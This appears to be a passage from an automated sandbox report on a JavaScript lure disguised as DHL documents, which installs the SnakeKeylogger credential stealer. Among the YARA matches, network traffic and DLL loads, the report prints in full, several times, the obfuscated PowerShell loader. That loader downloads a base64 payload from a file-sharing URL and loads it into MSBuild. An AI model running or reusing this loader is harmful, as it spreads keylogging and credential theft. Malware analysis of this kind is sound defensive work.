                  Source: MSBuild.exe, 00000003.00000002.2955066393.0000000002AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: powershell.exe, 00000001.00000002.1827359098.000001A457F7C000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2955066393.0000000002AF2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2951462853.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: MSBuild.exe, 00000003.00000002.2955066393.0000000002AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189d
                  Source: MSBuild.exe, 00000003.00000002.2955066393.0000000002AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                  Source: unknownHTTPS traffic detected: 193.30.119.105:443 -> 192.168.2.4:49731 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 159.253.39.62:443 -> 192.168.2.4:49732 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Contains functionality to log keystrokes (.Net Source)
                  Source: 1.2.powershell.exe.1a4587a94e8.6.raw.unpack, UltraSpeed.cs.Net Code: VKCodeToUnicode

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 1.2.powershell.exe.1a4587a94e8.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 1.2.powershell.exe.1a4587a94e8.6.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 1.2.powershell.exe.1a4587a94e8.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 1.2.powershell.exe.1a4587a94e8.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 1.2.powershell.exe.1a458530838.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000003.00000002.2951462853.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000001.00000002.1827359098.000001A457F7C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 7528, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 7528, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: MSBuild.exe PID: 7752, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Sample has a suspicious name (potential lure to open the executable)
                  Source: DHl-Global-Documents.jsStatic file information: Suspicious name
                  Wscript starts Powershell (via cmd or directly)
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$rhizocrinus = '#x#.kes/moc.milezug#emsik//:sp##h';$emasculation = $rhizocrinus -replace '#', 't';$Erlenmeyer = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$nonsymmetrical = New-Object System.Net.WebClient;$unturf = $nonsymmetrical.DownloadData($Erlenmeyer);$aspectabund = [System.Text.Encoding]::UTF8.GetString($unturf);$cristiform = '<<BASE64_START>>';$doura = '<<BASE64_END>>';$postmodifier = $aspectabund.IndexOf($cristiform);$propylaeum = $aspectabund.IndexOf($doura);$postmodifier -ge 0 -and $propylaeum -gt $postmodifier;$postmodifier += $cristiform.Length;$thoracici = $propylaeum - $postmodifier;$tattooings = $aspectabund.Substring($postmodifier, $thoracici);$huhus = [System.Convert]::FromBase64String($tattooings);$homotaxic = [System.Reflection.Assembly]::Load($huhus);$nonrehydrated = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($emasculation,'','','','MSBuild','','','','','','','','','',''))"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$rhizocrinus = '#x#.kes/moc.milezug#emsik//:sp##h';$emasculation = $rhizocrinus -replace '#', 't';$Erlenmeyer = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$nonsymmetrical = New-Object System.Net.WebClient;$unturf = $nonsymmetrical.DownloadData($Erlenmeyer);$aspectabund = [System.Text.Encoding]::UTF8.GetString($unturf);$cristiform = '<<BASE64_START>>';$doura = '<<BASE64_END>>';$postmodifier = $aspectabund.IndexOf($cristiform);$propylaeum = $aspectabund.IndexOf($doura);$postmodifier -ge 0 -and $propylaeum -gt $postmodifier;$postmodifier += $cristiform.Length;$thoracici = $propylaeum - $postmodifier;$tattooings = $aspectabund.Substring($postmodifier, $thoracici);$huhus = [System.Convert]::FromBase64String($tattooings);$homotaxic = [System.Reflection.Assembly]::Load($huhus);$nonrehydrated = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($emasculation,'','','','MSBuild','','','','','','','','','',''))"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD993BA37C1_2_00007FFD993BA37C
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD99481B891_2_00007FFD99481B89
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010FC5303_2_010FC530
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010F94803_2_010F9480
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010FC5213_2_010FC521
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010F946F3_2_010F946F
                  Source: DHl-Global-Documents.jsInitial sample: Strings found which are bigger than 50
                  Source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.powershell.exe.1a4587a94e8.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 1.2.powershell.exe.1a4587a94e8.6.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.powershell.exe.1a4587a94e8.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 1.2.powershell.exe.1a4587a94e8.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.powershell.exe.1a458530838.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000003.00000002.2951462853.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000001.00000002.1827359098.000001A457F7C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: powershell.exe PID: 7528, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: powershell.exe PID: 7528, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: MSBuild.exe PID: 7752, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 1.2.powershell.exe.1a4587a94e8.6.raw.unpack, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 1.2.powershell.exe.1a4587a94e8.6.raw.unpack, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winJS@6/3@4/4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7536:120:WilError_03
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k1foinhs.3ra.ps1Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: MSBuild.exe, 00000003.00000002.2955066393.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2955066393.0000000002B53000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2955066393.0000000002B63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: DHl-Global-Documents.jsVirustotal: Detection: 13%
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHl-Global-Documents.js"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$rhizocrinus = '#x#.kes/moc.milezug#emsik//:sp##h';$emasculation = $rhizocrinus -replace '#', 't';$Erlenmeyer = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$nonsymmetrical = New-Object System.Net.WebClient;$unturf = $nonsymmetrical.DownloadData($Erlenmeyer);$aspectabund = [System.Text.Encoding]::UTF8.GetString($unturf);$cristiform = '<<BASE64_START>>';$doura = '<<BASE64_END>>';$postmodifier = $aspectabund.IndexOf($cristiform);$propylaeum = $aspectabund.IndexOf($doura);$postmodifier -ge 0 -and $propylaeum -gt $postmodifier;$postmodifier += $cristiform.Length;$thoracici = $propylaeum - $postmodifier;$tattooings = $aspectabund.Substring($postmodifier, $thoracici);$huhus = [System.Convert]::FromBase64String($tattooings);$homotaxic = [System.Reflection.Assembly]::Load($huhus);$nonrehydrated = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($emasculation,'','','','MSBuild','','','','','','','','','',''))"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$rhizocrinus = '#x#.kes/moc.milezug#emsik//:sp##h';$emasculation = $rhizocrinus -replace '#', 't';$Erlenmeyer = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$nonsymmetrical = New-Object System.Net.WebClient;$unturf = $nonsymmetrical.DownloadData($Erlenmeyer);$aspectabund = [System.Text.Encoding]::UTF8.GetString($unturf);$cristiform = '<<BASE64_START>>';$doura = '<<BASE64_END>>';$postmodifier = $aspectabund.IndexOf($cristiform);$propylaeum = $aspectabund.IndexOf($doura);$postmodifier -ge 0 -and $propylaeum -gt $postmodifier;$postmodifier += $cristiform.Length;$thoracici = $propylaeum - $postmodifier;$tattooings = $aspectabund.Substring($postmodifier, $thoracici);$huhus = [System.Convert]::FromBase64String($tattooings);$homotaxic = [System.Reflection.Assembly]::Load($huhus);$nonrehydrated = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($emasculation,'','','','MSBuild','','','','','','','','','',''))"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mshtml.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: srpapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msiso.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ieframe.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: jscript9.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
